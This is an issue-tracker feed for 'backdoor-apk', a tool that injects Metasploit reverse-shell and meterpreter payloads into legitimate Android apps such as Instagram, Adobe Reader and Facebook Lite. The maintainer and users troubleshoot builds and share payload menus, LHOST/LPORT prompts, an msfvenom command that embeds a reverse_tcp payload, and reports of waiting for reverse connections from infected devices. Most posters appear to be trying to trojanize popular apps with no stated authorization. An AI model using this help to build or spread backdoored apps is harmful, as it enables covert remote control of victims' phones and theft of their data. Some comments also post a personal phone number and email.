https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.3.4.jar
it's ok

[2019-03-15 17:28] ghost commented on #130
copy the folder "backdoor-apk" to /usr/share/ and run again... :)

[2019-03-15 17:29] ghost commented on #130
copy the folder "backdoor-apk" to /usr/share/ and run again... :)

[2019-03-20 05:50] pretech86 commented on #147
thsnks my dear for this project, hope for more projects from you
i face the problem ( failed to decompile the file ) and i transfered the apk file to the same directory but still failed , can you help me please ?

[2019-03-20 06:19] pretech86 commented on #150
i solved this by choosing a asmall size app like 14 mb pdf reader

[2019-03-20 12:02] pretech86 commented on #165
@threst where ishould paste it after downloades
thanks a lot

[2019-03-23 16:03] ZWJGithubjoin commented on #130
Check your environment and configuration. Couldn't find: baksmali
  how to solve？ Install basksmali？

[2019-03-24 21:00] vilesis opened #169 "Exception in thread "main" java.lang.NoSuchMethodError:"
1. **Apktool Version (`apktool -version`)** - 2.4.0
2. **Operating System (Mac, Linux, Windows)** - Linux
3. **APK From? (Playstore, ROM, Other)** - APKPure

### Stacktrace/Logcat

[code]

[2019-03-26 09:41] SuhasWaydande9 commented on #30
Failed to recompile original project with backdoor

log file =
[run.log](https://github.com/dana-at-cp/backdoor-apk/files/3007428/run.log)

i tried to recompile with apktool separately and it failed several times, then i tried to Change the Output name of Original apk and it Worked.

does this have to do anything with recompiling Error.
and what kind of changes i have to make in your backdoor-apk.

[2019-04-07 10:19] simoohara2 commented on #165
https://ibotpeaches.github.io/Apktool/install/

[2019-05-06 05:21] FirstClickin commented on #157
🛑🛑 HERE IS THE **FIX** 2019 - https://youtu.be/QfyYWioLEk4
Full Video.

[2019-05-06 05:23] FirstClickin commented on #51
**🛑🛑🛑 Here is The FIX 2019..**  https://youtu.be/QfyYWioLEk4
Full Video by FirstClickin.

[2019-05-06 05:32] FirstClickin commented on #159
**🛑🛑🛑 Here is The FIX 2019..** https://youtu.be/QfyYWioLEk4 Full Video by FirstClickin. Solved now file is Recompiling without Error

[2019-05-06 05:33] FirstClickin commented on #138
**🛑🛑🛑 Here is The FIX 2019..** https://youtu.be/QfyYWioLEk4 Full Video by FirstClickin. Solved now file is Recompiling without Error

[2019-05-06 05:34] FirstClickin commented on #140
**🛑🛑🛑 Here is The FIX 2019..** https://youtu.be/QfyYWioLEk4 Full Video by FirstClickin. Solved now file is Recompiling without Error

[2019-05-06 05:34] FirstClickin commented on #52
**🛑🛑🛑 Here is The FIX 2019..** https://youtu.be/QfyYWioLEk4 Full Video by FirstClickin. Solved now file is Recompiling without Error

[2019-05-06 05:35] FirstClickin commented on #81
**🛑🛑🛑 Here is The FIX 2019..** https://youtu.be/QfyYWioLEk4 Full Video by FirstClickin. Solved now file is Recompiling without Error

[2019-05-07 17:51] zer0overflow commented on #164
Run these commands
`git clone https://github.com/JesusFreke/smali/`
`cd smali/blob/master/scripts/baksmali`
`export PATH=$PATH:$(pwd)`

I can't find the baksmali.jar file. If you get it from somewhere paste it to the folder where your baksmali script is there

[2019-05-07 17:55] zer0overflow commented on #164
Ok here's an update. Download backsmali.jar from here
https://bitbucket.org/JesusFreke/smali/downloads/
Then rename it to baksmali.jar and copy it to your baksmali script location.
Cheers! Give me a follow on instagram it's @zero.overflow

[2019-05-10 09:20] pretech86 opened #170 "installing error"
when i run the tool i get this error

[*] Running backdoor-apk.sh v0.2.4a on Thu 09 May 2019 05:39:05 PM EDT
./backdoor-apk.sh: line 134: $LOG_FILE: ambiguous redirect
[!] Check your environment and configuration. Couldn't find: msfvenom

[2019-05-14 17:55] dana-at-cp commented on #170
@pretech86 Try this stackoverflow Q&A: https://stackoverflow.com/questions/2462385/getting-an-ambiguous-redirect-error

The following message is letting you know that 'msfvenom' is not in your path:

[!] Check your environment and configuration. Couldn't find: msfvenom

[2019-05-14 17:55] #170 closed, assigned to nobody

[2019-05-14 17:57] dana-at-cp commented on #169
Try another APK, like the APKs that are distributed with backdoor-apk.

Also, try APKs from the Google Play Store. Can't support every APK in existence and definitely not APKs from third-party app stores.

[2019-05-14 17:57] #169 closed, assigned to nobody

[2019-05-21 20:17] dana-at-cp commented on #168
1. Make sure you are running the latest version of apktool
2. Check run.log and verify an error occurred during apktool recompilation
3. Execute the following command: apktool empty-framework-dir --force
4. Retry using the backdoor-apk.sh script

[2019-05-21 20:17] dana-at-cp commented on #168
More info from apktool: https://github.com/iBotPeaches/Apktool/issues/1579

[2019-05-21 20:18] #168 closed, assigned to nobody

[2019-05-21 20:18] dana-at-cp commented on #167
#168

[2019-05-21 20:18] #167 closed, assigned to nobody

[2019-05-21 20:19] dana-at-cp commented on #166
#168

[2019-05-21 20:19] #166 closed, assigned to nobody

[2019-05-21 20:20] dana-at-cp commented on #165
#168

[2019-05-21 20:20] #165 closed, assigned to nobody

[2019-05-21 20:21] dana-at-cp commented on #168
If none of the suggestions work then please try another APK. I can't provide support for apktool.

[2019-05-21 20:22] #164 closed, assigned to nobody

[2019-05-21 20:23] dana-at-cp commented on #163
Make sure you are using the latest stable version of msfvenom.

[2019-05-21 20:24] #163 closed, assigned to nobody

[2019-05-21 20:25] dana-at-cp commented on #162
There is persistence built-in that is supported in most cases.

[2019-05-21 20:25] #162 closed, assigned to nobody

[2019-05-21 20:25] #161 closed, assigned to nobody

[2019-05-21 20:27] dana-at-cp commented on #159
@WiredLife is on the right track. Check out #168

[2019-05-21 20:27] #159 closed, assigned to nobody

[2019-05-21 20:28] #158 closed, assigned to nobody

[2019-05-21 20:29] dana-at-cp commented on #157
#168

[2019-05-21 20:29] #157 closed, assigned to dana-at-cp

[2019-05-21 20:30] #156 closed, assigned to dana-at-cp

[2019-05-22 08:38] pretech86 commented on #130
thanks my dear it working now

[2019-05-22 11:14] lakis12345 opened #171 "Smali"
Failed to locate smali file to hook
Help me

[2019-05-22 13:23] dana-at-cp commented on #171
Please attach the APK file you are working with and the run.log file as well.

[2019-06-03 19:59] #171 closed, assigned to nobody

[2019-06-07 10:39] pretech86 opened #172 "the only third party applications can be used ?"
thanks for the tool but we can use only the third party applications in the tool ? or we can use any application ?

[2019-06-07 10:47] pretech86 opened #173 "no reverse connections"
thanks for the tool but all steps finished but i didn't recieved a reverse connection
i used msfconsole -r backdoor-apk.rc also i used the third party applications

[2019-07-03 14:39] dana-at-cp commented on #173
Need more information. Are you attempting to receive a reverse connection on the same LAN/subnet or across the Internet for example?

[2019-07-09 06:39] irfankhan090 commented on #75
I'm still waiting after 2 years.

[2019-07-09 07:26] LuisMayo commented on #75
I didn't get to try again if it was indeed fixed, I can't believe it have already been 2 years.
I'll check when I have time

[2019-07-19 03:42] ProXpert89 opened #174 "Failed to compiled ."
[+] Android payload options:
1) meterpreter/reverse_http   3) meterpreter/reverse_tcp    5) shell/reverse_https
2) meterpreter/reverse_https  4) shell/reverse_http         6) shell/reverse_tcp
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: xx.xx.xx.xxx
[?] Please enter an LPORT value: 443
[+] Android manifest permission options:
1) Keep original
2) Merge with paylo

[2019-07-22 23:51] bvdx199 opened #175 "used Third-party APK look the error in the log file"
i used the third party apk AdobeReader.apk

it gave me the following error in the log file

 invoke-static {}, Lcom/adobe/reader/kohgw/Dwupt;->start()V
The smali file was hooked successfully
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
I: Using Apktool 2.3.1
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether

[2019-08-13 13:03] allex4freedom commented on #132
Hello i have this message when i try :
Failed to recompile original project with backdoor
Any soution ?
[run.log](https://github.com/dana-at-cp/backdoor-apk/files/3497019/run.log)

[2019-08-15 20:14] dana-at-cp commented on #175
@bvdx199 That's an old Apktool version.

[2019-08-15 20:14] #175 closed, assigned to nobody

[2019-08-15 20:15] dana-at-cp commented on #172
@pretech86 You can use any APK that decompiles/recompiles successfully.

[2019-08-15 20:15] #172 closed, assigned to nobody

[2019-08-15 20:16] dana-at-cp commented on #174
Apktool is used to decompile/recompile APK files.

[2019-08-15 20:16] #174 closed, assigned to nobody

[2019-08-15 20:17] #173 closed, assigned to nobody

[2019-08-21 05:51] Arnab9976 commented on #47
usr/bin/apktool -version
2.3.4-dirty
this apktool are latest version but Failed to recompile original project with backdoor.

[2019-08-27 15:36] Hacker007RP commented on #105
first you install new version of apktool and wrapper file in your linux
you can get this new apktool and wrapper https://www.youtube.com/redirect?v=KRc4T6Mo8w4&event=video_description&q=https%3A%2F%2Fibotpeaches.github.io%2FApktool%2Finstall%2F&redir_token=QlqEaRkXIYvv9IPWU239sliX5Vx8MTU2NzAwNjE5OEAxNTY2OTE5Nzk4
you can save apktool.jar file and wrapper save as apktool
you can give permission to t

[2019-09-03 16:43] majid-d opened #176 "Failed to recompile original project with backdoor"
"Failed to recompile original project with backdoor"
Stuck at this process, i have tried with other .apk files but no success
using Parrot OS the latest version on virtual box
am i the only one confronting with this issue ?

[2019-09-03 20:53] rrnamitesh opened #177 "Failed to run baksmali on classes.dex created for Java class files"
I keep on getting this error.

[2019-09-06 17:19] adityaponukupati commented on #105
this error repeated again with some another error comment but the final
error is same comment 'unable to rebuild apk with apktool mentioned below
error photo

On Tue, Aug 27, 2019 at 9:07 PM Hacker007RP <notifications@github.com>
wrote:

[2019-09-08 12:31] hakbibi commented on #164
how can i add the script to path?

[2019-09-17 05:55] Hacker007RP commented on #105
produce the following following procedure i will give in comment because i also got this error but now it will be solve
i will provide you my video just mail me on my gmail

[2019-09-17 06:06] Hacker007RP commented on #105
your system cand install apktool latest version in kali linux
you will get error only for this
download apktoolfix on github and run chmod +x apktoolfix.sh
then it will be download the letest version of apktool such as 2.4.0
you need for this apktool version for building an apk

[2019-09-17 14:28] adityaponukupati commented on #105
u can contact me at my mail : adityaponukupati@gmail.com and my phone no is
9182458102 sending you details because i dont have your mail id

On Tue, Sep 17, 2019 at 11:25 AM Hacker007RP <notifications@github.com>
wrote:

[2019-09-20 15:18] userRohit commented on #157
[!] Failed to recompile original project with backdoor
#face that problem
i have apktool  version 2.3.4-dirty
plz solve this problem

[2019-09-21 17:24] justMSARahat commented on #157
hey.i have same problem.
But I notice That My linux Doesn't have installed lib32ncrses5.
And I am unable to install that,
when i type : apt-get install lib23ncrses5
the i found this: e unable to locate this package.
and this is the main problem of that.
if anyone can solve that problem???

[2019-09-21 17:25] justMSARahat commented on #51
But I notice That My linux Doesn't have installed lib32ncrses5.
And I am unable to install that,
when i type : apt-get install lib23ncrses5
the i found this: e unable to locate this package.
and this is the main problem of that.
if anyone can solve that problem???  this is the problem?

[2019-09-25 07:09] bvdx199 commented on #164
what does $PATH mean I hear it alot

[2019-10-02 09:27] justMSARahat opened #178 "Failed to locate smali file to hook"
[*] Running backdoor-apk.sh v0.2.4a on Wed 02 Oct 2019 03:18:49 PM +06
[+] Android payload options:
1) meterpreter/reverse_http   4) shell/reverse_http
2) meterpreter/reverse_https  5) shell/reverse_https
3) meterpreter/reverse_tcp    6) shell/reverse_tcp
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: ------------
[?] Please enter an LPORT value: ----
[+] Android m

[2019-10-21 11:31] hossamsalem23 commented on #51
just try apt-get install libz1 libncurses5 libstdc++6

bec your arch 32 !

[2019-12-10 15:38] jacobrohit commented on #157
/ ______ \
         || _  _ ||
         ||| || |||          AAAAAA   PPPPPPP   KKK  KKK
         |||_||_|||         AAA  AAA  PPP  PPP  KKK KKK
         || _  _o|| (o)     AAA  AAA  PPP  PPP  KKKKKK
         ||| || |||         AAAAAAAA  PPPPPPPP  KKK KKK
         |||_||_|||         AAA  AAA  PPP       KKK  KKK
         ||______||         AAA  AAA  PPP       KKK  KKK
        /__________\
________|_

[2019-12-10 15:39] jacobrohit commented on #157
/ ______ \
         || _  _ ||
         ||| || |||          AAAAAA   PPPPPPP   KKK  KKK
         |||_||_|||         AAA  AAA  PPP  PPP  KKK KKK
         || _  _o|| (o)     AAA  AAA  PPP  PPP  KKKKKK
         ||| || |||         AAAAAAAA  PPPPPPPP  KKK KKK
         |||_||_|||         AAA  AAA  PPP       KKK  KKK
         ||______||         AAA  AAA  PPP       KKK  KKK
        /__________\
________|_

[2019-12-10 15:39] jacobrohit commented on #157
/ ______ \
         || _  _ ||
         ||| || |||          AAAAAA   PPPPPPP   KKK  KKK
         |||_||_|||         AAA  AAA  PPP  PPP  KKK KKK
         || _  _o|| (o)     AAA  AAA  PPP  PPP  KKKKKK
         ||| || |||         AAAAAAAA  PPPPPPPP  KKK KKK
         |||_||_|||         AAA  AAA  PPP       KKK  KKK
         ||______||         AAA  AAA  PPP       KKK  KKK
        /__________\
________|_

[2019-12-10 21:37] kelvinmatheka commented on #133
How did you fix it

[2019-12-18 08:56] jacobrohit opened #179 "[!] Failed to align recompiled APK and date: invalid date ‘Fri Jan 15 07:11:31 2112’"
[*] Running backdoor-apk.sh v0.2.4a on Wed 18 Dec 2019 02:09:27 PM IST
[+] Android manifest permission options:
1) Keep original
2) Merge with payload and shuffle
[?] Please select an Android manifest permission option: 2
[*] Decompiling original APK file...done.
[*] Locating smali file to hook in original project...done.
[+] Package where RAT smali files will be injected: com/instagram/android
[+

[2020-01-13 06:41] yeguangxiadedaya commented on #176
hello,i had the same issue with that process?,i don't know how to do ,please tell me if you knew already.thanks

[2020-01-18 17:33] sindikto commented on #176
oh my friend, no I am with this problem too,
I've kali  19 roling and  probe diferent options and nothing to do
if you know how do it please write me, thanks.

[2020-01-21 02:03] icecliffs commented on #177
Metoo

[2020-02-07 14:04] CiberSecLabs commented on #177
same as above -- Failed to run baksmali on classes.dex created for Java class files .. Please Help !  thanks

[2020-03-14 18:52] zackvirushacke opened #180 "erro smali"
Failed to locate smali file to hook ?

[2020-03-24 13:37] robinhamie123 commented on #164
my Friends what path i put baksmali in it ???? there is to much files wich one  of these i put it and where

[2020-03-24 13:39] robinhamie123 commented on #164
............................................................................................................
my Friend what is the script location where i,ll copy it to ????

[2020-03-29 15:00] Alexandre-ux commented on #177
Estou com o mesmo problema.
Alguém sabe a solução?plis

[2020-03-29 15:02] Alexandre-ux opened #181 "Failed to run baksmali on classes.dex created for Java class files"
Alguém sabe a solução para esse erro?

[2020-03-29 15:08] Alexandre-ux commented on #176
Devem instalar zipalign.
sudo apt-get install zipalign

[2020-03-29 15:29] #177 closed, assigned to nobody

[2020-03-31 05:25] dual-somkietacode commented on #181
@Alexandre-ux Preciso de mais detalhes sobre o erro em questão. procure no arquivo run.log e copie o conteúdo aqui.
I need more details on the error in question. look in the run.log file and copy the content here.

[2020-03-31 05:39] Pr-X374 commented on #180
see the run.log file

[2020-03-31 05:41] dual-somkietacode commented on #179
showme the run.log

[2020-04-03 16:19] dual-somkietacode opened #182 "Java.lang.NullPointerException : the trustedCert parameter must be nonnull"
Hi . I have an issue while signing the recompiled apk i get a jarsigner error in the runlog saying that : jarsigner : error : Java.lang.NullPointerException : the trustedCert parameter must be nonnull. I try to find the solution on internet but nothing . Could you help me please...

[2020-04-03 16:27] Pr-X374 commented on #180
I get the same problem last week your apk android:name atribut dont exisit in the manifest you have to find it manualy and replace $android_class by $total_pakage/$android_name . Where android name shall be Main or .Main or MainActivty

[2020-04-03 16:30] dual-somkietacode commented on #180
I get the same problem last week your apk android:name atribut dont exisit in the manifest you have to find it manualy and replace $android_class by $total_pakage/$android_name . Where android name shall be Main or .Main or MainActivty

[2020-04-03 19:05] delgiu87 opened #183 "Failed to locate smali file to hook"
run.log   I think some upgrade in google certificate? how can solve this? we should upgrade something? just tried with other apps

I: Decoding file-resources...
W: Cant find 9patch chunk in file: "drawable-xxhdpi-v4/common_google_signin_btn_text_light_normal_background.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-xxhdpi-v4/common_google_signin_btn_icon_dark_normal_bac

[2020-04-03 23:54] delgiu87 commented on #75
someone fix the problem? still now same error. we lose time to follow fake sw?

[2020-04-04 22:52] wesley006 opened #184 "Couldn't find: baksmali"
[*] Running backdoor-apk.sh v0.2.4a on Sat Apr  4 19:46:32 -03 2020
[!] Check your environment and configuration. Couldn't find: baksmali

[2020-04-10 02:43] illusion77 commented on #184
i have the same question...and how do i to install baksmali?

[2020-04-12 17:00] MrFey commented on #178
hey did you find how to fix that problem ?

[2020-04-12 23:39] MrFey commented on #75
UP!

[2020-04-13 00:06] MikaBass opened #185 "Check your environment and configuration. Coudn't find: apktool"
I'm receiving this error message when I try to to run ./backdoor-apk.sh

[2020-04-16 16:53] kali-glitch opened #186 "[!] Failed to recompile original project with backdoor"

[2020-05-07 11:53] smartdickson commented on #51
I am also have this error
But it is only based on apktool error!!!!

[2020-05-09 17:47] BotSabugogrosso commented on #184
#git clone https://github.com/JesusFreke/smali.git
#cd smali
#./gradlew

[2020-05-10 18:28] Cat-lgtm commented on #51
these are all installed. there is still a problem. back door fails

[2020-05-11 05:16] Rinazz opened #187 "Bakdoor apk"

[2020-05-11 14:27] managedb630 commented on #186
same here

[2020-05-13 00:45] ll3N1GmAll commented on #75
Still seeing this issue on numerous apks

[2020-05-13 00:46] ll3N1GmAll commented on #178
I see this was a bug and was supposed to have been fixed back in 2017. I am still seeing this issue on numerous APKs.

[2020-05-20 11:43] smartdickson commented on #51
you can solve it by use fatrat or decompile using ruby apk-embed-payload.rb "your apk file path"
to recombile. This method want a "apk-embed-payload.rb" file you should Download  from web.

[2020-05-21 11:34] hosseinka1380 commented on #105
root@dhcppc0:~# msfvenom -x facebook-lite_3717850734.exe -p android/meterpreter/reverse_tcp LHOST=..... LPORT=4444 -o /root/lite.apk
Using APK template: facebook-lite_3717850734.exe
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
Error: Malformed version number string 2.4.1-dirty
Picked up _JAVA_OP

[2020-05-25 06:27] vinay636 commented on #51
![IMG_20200525_115644](https://user-images.githubusercontent.com/45120160/82784780-d97ae800-9e7e-11ea-9135-42ed183e4382.jpg)

please solve my problem

[2020-05-26 02:18] steef98 commented on #184
________
         / ______ \
         || _  _ ||
         ||| || |||          AAAAAA   PPPPPPP   KKK  KKK
         |||_||_|||         AAA  AAA  PPP  PPP  KKK KKK
         || _  _o|| (o)     AAA  AAA  PPP  PPP  KKKKKK
         ||| || |||         AAAAAAAA  PPPPPPPP  KKK KKK
         |||_||_|||         AAA  AAA  PPP       KKK  KKK
         ||______||         AAA  AAA  PPP       KKK  KKK
        /____

[2020-06-14 02:43] alexynior28 commented on #186
Hi, try using Apktool version 2.3.3. That works for me. I tried it with this APK: https://apkpure.com/es/how-to-gu%C3%ADa-para-inform%C3%A1ticos/com.esgeeks.howto_informaticos

[2020-06-23 19:41] vaerda opened #188 "Backdoor-apk + Ngrok tcp + msfconsole not working!"
![bacdoorapk+msfconsole+ngrok-error](https://user-images.githubusercontent.com/66242421/85450311-42c54800-b55e-11ea-9d7e-28824fad96e6.png)

Hi, i've just created a infected app with backdoor-apk and it decompilation and compilation it's all right, but when i try to connect the backdoor with msfconsole says was not created, when the apk has been already executed by the android.

I hope yo can help

[2020-06-27 16:51] tarek412 opened #189 "Failed to run baksmali on classes.dex created for Java class files"
I was using ./backdoor-apk.sh appname.apk command and i am stuck at this error "Failed to run baksmali on classes.dex created for Java class files"
Someone please help?

[2020-06-29 16:48] strikerkill commented on #130
1

[2020-07-02 18:31] pablicki opened #190 "Ss"
Yemen’s

[2020-07-06 11:25] alexanderajju opened #191 "Failed to locate smali file to hook"
________
         / ______ \
         || _  _ ||
         ||| || |||          AAAAAA   PPPPPPP   KKK  KKK
         |||_||_|||         AAA  AAA  PPP  PPP  KKK KKK
         || _  _o|| (o)     AAA  AAA  PPP  PPP  KKKKKK
         ||| || |||         AAAAAAAA  PPPPPPPP  KKK KKK
         |||_||_|||         AAA  AAA  PPP       KKK  KKK
         ||______||         AAA  AAA  PPP       KKK  KKK
        /____

[2020-07-06 11:44] alexanderajju commented on #186
does it work for any other

[2020-07-06 12:06] 0xt1m commented on #186
Hi, thank but no

On Mon, Jul 6, 2020, 2:44 PM Aju Alex <notifications@github.com> wrote:

[2020-07-08 03:03] EliasHridoy commented on #184
@BotSabugogrosso
I tried your procedure but not worked.

[2020-07-09 02:38] Aholicknight commented on #191
Having this issue also. Does anyone know how to fix it?

[2020-07-09 06:56] eliastr14 opened #192 "."

[2020-07-09 15:14] #187 closed, assigned to nobody

[2020-07-09 15:26] #192 closed, assigned to nobody

[2020-07-29 17:07] chinmayrp17 opened #193 "Original APK file specified does not exist"
Original APK file specified does not exist

[2020-07-29 17:13] chinmayrp17 commented on #193
root@kali://backdoor-apk/backdoor-apk# ./backdoor-apk.sh winrar.apk
          ________
         / ______ \
         || _  _ ||
         ||| || |||          AAAAAA   PPPPPPP   KKK  KKK
         |||_||_|||         AAA  AAA  PPP  PPP  KKK KKK
         || _  _o|| (o)     AAA  AAA  PPP  PPP  KKKKKK
         ||| || |||         AAAAAAAA  PPPPPPPP  KKK KKK
         |||_||_|||         AAA  AAA  PPP       K

[2020-08-02 09:00] frostKn commented on #176
that doesn't solve the problem for me .... normal decompile and recompile works just fine
I tried changing the apktools.jar
zipalign is installed
installed lib32ncurses5
changed to java 8
no luck yet.
__________________
this is the run.log error
___________________

The smali file was hooked successfully
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
I: Using Apkto